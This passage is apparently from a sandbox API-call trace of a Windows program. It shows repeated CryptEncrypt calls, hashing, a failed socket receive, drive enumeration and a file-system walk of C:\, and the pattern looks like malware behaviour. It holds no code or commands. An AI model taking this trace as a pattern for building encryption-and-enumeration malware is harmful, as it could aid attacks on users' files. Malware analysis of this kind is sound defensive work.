pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.277] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] malloc (_Size=0x1fd) returned 0x606108 [0197.278] free (_Block=0x0) [0197.278] free (_Block=0x3691478) [0197.278] free (_Block=0x3691270) [0197.278] malloc (_Size=0x1fd) returned 0x3691270 [0197.278] free (_Block=0x0) [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.278] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.279] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.280] malloc (_Size=0x1fd) returned 0x3691478 [0197.280] free (_Block=0x0) [0197.280] free (_Block=0x606108) [0197.280] malloc (_Size=0x1fd) returned 0x606108 [0197.280] free (_Block=0x0) [0197.280] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0197.280] CryptHashData (hHash=0x432db8, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0197.280] malloc (_Size=0x14) returned 0x3f65320 [0197.280] free (_Block=0x0) [0197.280] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f65320, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65320, pdwDataLen=0x339faec) returned 1 [0197.280] CryptHashData (hHash=0x432c78, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0197.280] free (_Block=0x3f65320) [0197.280] CryptDestroyHash (hHash=0x432db8) returned 1 [0197.281] free (_Block=0x606108) [0197.281] free (_Block=0x3691270) [0197.281] malloc (_Size=0x1fd) returned 0x3691270 [0197.281] free (_Block=0x0) [0197.281] malloc (_Size=0x1) returned 0x3f4bf98 [0197.281] free (_Block=0x0) [0197.281] malloc (_Size=0x1) returned 0x3f4c068 [0197.281] free (_Block=0x0) [0197.281] free (_Block=0x0) [0197.281] free (_Block=0x3f4bf98) [0197.281] SetEvent (hEvent=0x380) returned 1 [0197.281] SetEvent (hEvent=0x5b0) returned 1 [0197.281] free (_Block=0x3f4c068) [0197.281] free (_Block=0x3691270) [0197.281] free (_Block=0x3691478) [0197.281] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0197.281] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268) returned -1 [0197.309] free (_Block=0x0) Thread: id = 203 os_tid = 0x84 [0197.500] GetLastError () returned 0x0 [0197.500] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x4165d0 [0197.501] SetLastError (dwErrCode=0x0) [0197.501] GetCurrentThreadId () returned 0x84 [0197.501] GetCurrentThreadId () returned 0x84 [0197.501] RtlWakeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.504] GetLogicalDriveStringsA (in: nBufferLength=0x400, lpBuffer=0x11af784 | out: lpBuffer="C:\\") returned 0x8 [0197.504] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0197.504] GetDriveTypeA (lpRootPathName="E:\\") returned 0x3 [0197.504] GetLogicalDriveStringsA (in: nBufferLength=0x400, lpBuffer=0x11af784 | out: lpBuffer="C:\\") returned 0x8 [0197.504] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0197.504] GetDriveTypeA (lpRootPathName="E:\\") returned 0x3 [0197.504] Sleep (dwMilliseconds=0x1000) Thread: id = 204 os_tid = 0xbdc [0197.575] GetLastError () returned 0x0 [0197.575] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x435f20 [0197.576] SetLastError (dwErrCode=0x0) [0197.576] GetCurrentThreadId () returned 0xbdc [0197.576] GetCurrentThreadId () returned 0xbdc [0197.576] RtlWakeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.578] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1c) returned 0x43cd28 [0197.578] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d388 [0197.578] RtlInitializeConditionVariable (in: ConditionVariable=0x43d38c | out: ConditionVariable=0x43d38c) [0197.578] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42b218 [0197.578] RtlInitializeConditionVariable (in: ConditionVariable=0x42b220 | out: ConditionVariable=0x42b220) [0197.578] GetCurrentThreadId () returned 0xbdc [0197.578] GetCurrentThreadId () returned 0xbdc [0197.578] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438a18 [0197.578] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438a24 | out: phModule=0x438a24*=0x320000) returned 1 [0197.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438a18, dwCreationFlags=0x0, lpThreadId=0x12afc54 | out: lpThreadId=0x12afc54*=0x168) returned 0x554 [0197.579] SleepConditionVariableSRW (in: ConditionVariable=0x43d38c, SRWLock=0x42b220, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d38c, SRWLock=0x42b220) returned 1 [0197.660] GetCurrentThreadId () returned 0xbdc [0197.660] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.660] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d388 | out: hHeap=0x3c0000) returned 1 [0197.660] CloseHandle (hObject=0x554) returned 1 [0197.660] InitOnceExecuteOnce (in: InitOnce=0x38c9d0, InitFn=0x322847, Parameter=0x38c9d4, Context=0x0 | out: InitOnce=0x38c9d0, Parameter=0x38c9d4, Context=0x0) returned 1 [0197.660] GetLastError () returned 0x0 [0197.660] SetLastError (dwErrCode=0x0) [0197.660] AreFileApisANSI () returned 1 [0197.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x12afd1c, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0197.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x8, lpMultiByteStr=0x12afd1c, cbMultiByte=3, lpWideCharStr=0x12afbf4, cchWideChar=3 | out: lpWideCharStr="C:\\") returned 3 [0197.661] FindFirstFileExW (in: lpFileName="C:\\*", fInfoLevelId=0x1, lpFindFileData=0x12af844, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af844) returned 0x432bb8 [0197.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x68) returned 0x41f1f8 [0197.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0197.661] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.661] InitOnceExecuteOnce (in: InitOnce=0x38c9d0, InitFn=0x322847, Parameter=0x38c9d4, Context=0x0 | out: InitOnce=0x38c9d0, Parameter=0x38c9d4, Context=0x0) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0197.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$GetCurrent", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$GetCurrent", cchWideChar=11, lpMultiByteStr=0x12afcd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$GetCurrent", lpUsedDefaultChar=0x0) returned 11 [0197.661] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x12afcc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 14 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x12afc3c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 14 [0197.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0197.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x12afc24, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 14 [0197.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0197.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent", cchWideChar=14, lpMultiByteStr=0x12afbdc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent", lpUsedDefaultChar=0x0) returned 14 [0197.662] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0197.662] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x4) returned 0x419df8 [0197.662] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0197.662] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0197.662] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432cf8 [0197.663] FindNextFileW (in: hFindFile=0x432cf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="..", cAlternateFileName="")) returned 1 [0197.663] FindNextFileW (in: hFindFile=0x432cf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="Logs", cAlternateFileName="")) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b8e0 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="Logs", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0197.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="Logs", cchWideChar=4, lpMultiByteStr=0x12afcd8, cbMultiByte=4, lpDefaultChar=0x0, 